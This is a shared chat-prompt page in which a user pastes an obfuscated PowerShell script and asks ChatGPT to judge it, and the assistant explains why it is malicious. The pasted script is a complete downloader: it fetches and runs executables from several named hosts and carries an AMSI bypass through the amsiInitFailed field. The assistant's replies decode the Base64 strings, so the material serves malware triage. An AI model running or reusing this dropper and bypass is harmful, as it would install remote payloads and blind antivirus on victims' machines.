Prompt Title: Safe or Malicious Script?

Created 1 year ago
Votes 0
Views 92 times
IT
0
Human: Decide whether the following file is either "Malicious" or "Safe", if you are unable to decide it is "Suspicious". Answer simply by writing the verdict, for example: "[Suspicious]" $qzi=new-object net.webclient $mrs='http://habarimoto24.com/nh@http://fenett2018.com/dobgx@http://eastend.jp/bl5kfa@http://bemnyc.com/u8erijeq@http://abakus-biuro.net//a9zqemm'.split('@') $wai = '509' $kqz=$env:public+'\'+$wai+'.exe' foreach($cme in $mrs){try{$qzi.downloadfile($cme, $kqz) invoke-item $kqz }catch{}} aechah1yai2zus9oo5ohj3kooxu2eidoak0eiXeKah6aeTheephohweloh8Taesho6oor4eeChaeque3oog0ahye1eiSao2Pee4iet7jaetei9aiwe2queifai1hoo6Taelocoo6iShaishiequooghoushaiboziexeifaeph6nu3ohshah1eeb5aim1Phoh5oisaichaexaedae6eeng2eighohCae1YaaNgee7Choohoo0ej6mae5Xeem8shiejio8teigeeFoopaedaeSahGhee7dae6xahm0thago5woiNahhoor4Eepie0aeNook1boo9Ee9hae6aiXah9ooquoYae3daiquaomoalohw1quuoshaigiJai0sei1iecaeth0ho7Aezaiy2ier3pheCh4shahGohM1eet1ov3Oak5sohxingangeiloo6Ve0bai8aeVijeiwaihu1la6Oht2iahaepi0ea6pohsiew2cho1oCeighu9shoh7eit [Ref].Assembly.GetType([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('U3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbi5BbXNpVXRpbHM='))).GetField([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('YW1zaUluaXRGYWlsZWQ=')),'NonPublic,Static').SetValue($null,$true) Add-Type -TypeDefinition "using System using System.Diagnostics using System.Runtime.InteropServices [StructLayout(LayoutKind.Sequential)]public struct l1Ill1{public IntPtr llI1Il1111 public IntPtr ll11llII111 public uint II11IIIIIIl public uint Il1lI1 }[StructLayout(LayoutKind.Sequential,CharSet=CharSet.Unicode)]public struct l1lll1l{public uint II1l1Il1II public string I11l1111I public string lllIIlII public string l1I1IIllI1I1 public uint I1I1ll11I public uint lIlII11 public uint II11lIIl11I public uint lIl1lIl1II11 public uint lIIl1Il public uint Illl11I1 public uint II1ll1l11 public uint IlIlIl1Illl public short l11111lI1l public short lllIllI11I11 public IntPtr I1II1lIII public IntPtr Il11lI1 public IntPtr ll1IlI public IntPtr l1l11Il1lll1 public static class lIlIlI{[DllImport(""kernel32.dll"",SetLastError=true)]public static extern bool CreateProcess(string llllIIIllIlI,string l1111I1I11I1,IntPtr ll1Il111,IntPtr IIIll11Il1,bool l1Il1lll111,uint IIlIl11l11l,IntPtr Il1I1Il11l1l,string l1l1Illl,ref l1lll1l Il111,out l1Ill1 II11l111lII1) $I1II1I="$env:userprofile\AppData\LocalLow\$(-join((48..57)+(65..90)+(97..122) Get-Random -Count 8 %{[char]$_})).tmp" $IIl11ll11I11='http://yourmother4cancer.info/Nereidae/ZdDZ/umping HGn3Nw=1932-05-23' [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('JGNsaT0oTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KTskY2xpLkhlYWRlcnNbJ1VzZXItQWdlbnQnXT0nd2VmMktvNFo3NHhPV2k2Ryc7JGNsaS5Eb3dubG9hZEZpbGUoJElJbDExbGwxMUkxMSwkSTFJSTFJKTs=')) $III11ll1=New-Object l1lll1l $III11ll1.l11111lI1l=0x0 $III11ll1.II1l1Il1II=[System.Runtime.InteropServices.Marshal]::SizeOf($III11ll1) $ll11Il1Il=New-Object l1Ill1 [lIlIlI]::CreateProcess($I1II1I,$I1II1I,[IntPtr]::Zero,[IntPtr]::Zero,$false,0x00000008,[IntPtr]::Zero,"c:",[ref]$III11ll1,[ref]$ll11Il1Il) out-null iecaik0phohHoIzMMQADOawmNKvZXWbguaUVdJNpFXPsgRbeIyPzAUhzNmQLvXrzSLnEXMbnFUGStIkLxMxHMdutzIVXyqszuPZCKypWzBhuNpLGqFVGprrHDXwUZHfLnOmUmFmBQfsTEQUDkEMNzVMhquXHnyUZHZmaMIwdfaRlGljgqjqbjbskkjHPgLPtACcznPhFNHGWctYmUtfhPtdUrlIJcvboeORfQSjeIQdgNKOcTWfzOrtclgOxoUpKoqFcqyMXCngPFWyMhqZYteVZRQEGnseSZUwXFFcSbebsJvAGJxDsawwOkBvFlNPZcGeDpsxoFHEqAbQPcvngQacwMHzFHFLCinumnrtneseqKoOzswOwjRDvkDUvoilqpyWEeXGbBDcggQVpcVsXYXSOtfOyEmoYVJUKqOuHLzvTlyCZMsMmCKJtxgYPzElJELpEMaKEDUXUBZqplOXsFMYZXPUuaEgJggxlDuBOZSsCBDmzWcKmuvfSLmYGdadzIsfGnBBMqdhuLLNzboTswadHGftUyCUwJvtSdRUOEVosiVaqpYOhPoTpbYHXTMEDNNliwVbZieDrjJYfLvxqjLxUyHJwnEOVXqkhEFeNxEbHofUYVIeClCbDAiYOmOKxACmwBYdJnLTxkkKKMBzeFJZeHPtKtOEEOSejAkkKLApxfqmPrVOZNIGCqVmTnEwZEYydAQurpBLqmOzraAIMnDgvCkcThptpeNMHqpItivnhwpnhFucWCKJYNsevNbBExyBgdFSMFnXRxNgShvEEipuealextjWJkdpxBtUnOXgbqjXCxDemghmECfWppKpdHowdudunKVpLGIwsuKPDPMDDvyfeDXFnjuhpxebXssccdHSwHgPAsjHnEGFBBhsYHSWhBKAsUXHDwPTsUheQZHTXWszanGEQLaVgWPxNbEvHmORdRKzYEiPDvCbUTxTafxjOlnqDDmElXLplblYntKfIOpTXjmLSkvIUZoHFvluUYCvcZPfCiFDCHakAiQER
ChatGPT:

[Malicious]

Human: expl;ain you verdict
ChatGPT:

I determined the file to be malicious based on the following observations:

  1. The script is written in PowerShell, which is a powerful scripting language often used by malicious actors to perform various actions on a victim's computer.
  2. The script downloads and executes a file from multiple suspicious URLs using a WebClient object. The domains in the URLs (e.g., habarimoto24.com, fenett2018.com, eastend.jp, etc.) are not reputable, which raises concerns about the files being downloaded.
  3. The script creates a randomly named temporary file in the user's AppData\LocalLow folder, a common location used by malware to store and execute malicious files.
  4. The script uses Base64 encoding and string manipulation to obfuscate its true purpose, making it difficult for casual observers to understand what the script is doing. This is a common technique used by malware authors to avoid detection.
  5. The script contains multiple references to suspicious domains (e.g., yourmother4cancer.info), further indicating that the script may be attempting to download and execute additional malicious content.

Based on these factors, I concluded that the file is malicious.

Human: is there a payload involved?
ChatGPT:

Yes, there is a payload involved in this script. The payload refers to the actual malicious content or action that the script delivers or executes on the victim's computer. In this case, the payload is the file being downloaded from the suspicious URLs and subsequently executed on the victim's system.

The script downloads the payload from multiple URLs, likely as a redundancy measure to ensure that if one URL is unavailable or blocked, the script will still attempt to download the payload from the remaining URLs. Once the payload is downloaded and saved as an .exe file in the user's AppData\LocalLow folder, the script invokes the payload, potentially causing harm to the system or compromising the victim's data.

Furthermore, the script appears to be involved in additional payload-related activities, such as downloading and executing more files from other suspicious domains. These secondary payloads can further compromise the victim's system and data or perform other malicious tasks.

Human: what is the base64 part?
ChatGPT:

The Base64 part in the script is used as an obfuscation technique to hide the true intent of the code. Base64 is a binary-to-text encoding scheme that represents binary data in an ASCII string format. In this script, the Base64-encoded strings are used to hide function names, method calls, and other critical parts of the code.

For example, in the script, you can see the following Base64-encoded string:

makefile
U3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbi5BbXNpVXRpbHM=

When decoded, it reveals:

System.Management.Automation.AmsiUtils

This is a reference to a .NET class related to the Anti-Malware Scan Interface (AMSI). The script uses this class to bypass AMSI and disable any warnings or detections that might be triggered by the script's malicious actions.

Similarly, another Base64-encoded string:

makefile
YW1zaUluaXRGYWlsZWQ=

Decodes to:

amsiInitFailed

This is a field name within the System.Management.Automation.AmsiUtils class. The script modifies this field to bypass AMSI and avoid detection.

Using Base64 encoding is a common technique employed by malware authors to make their code more difficult to analyze and understand, allowing them to evade detection by security software and human analysts.

avatar
Itamar Gafni
Shared 1 prompt
Created 1 year ago

Leave a Comment